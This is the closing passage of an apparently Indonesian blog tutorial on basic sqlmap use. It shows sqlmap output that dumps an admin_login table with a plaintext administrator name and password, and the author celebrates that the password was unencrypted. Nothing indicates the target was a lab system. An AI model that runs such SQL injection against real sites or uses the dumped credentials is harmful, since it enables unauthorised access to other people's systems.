[17:23:23] [INFO] retrieved: ypt01234
 
Database: ypt_v2
 
Table: admin_login
 
[1 entry]
 
+-----------------+---------------------+
 
| admin_name | admin_password    |
 
+-----------------+---------------------+
 
| Administrator | ypt01234 |
 
+-----------------+---------------------+
<pre>
binggoooo kita dapat. Dan passwordnya tidak terenkripsi, beruntungnya.
Sekian tutorial dasar sqlmap, semoga bermanfaat.

Twitter Delicious Facebook Digg Stumbleupon Favorites More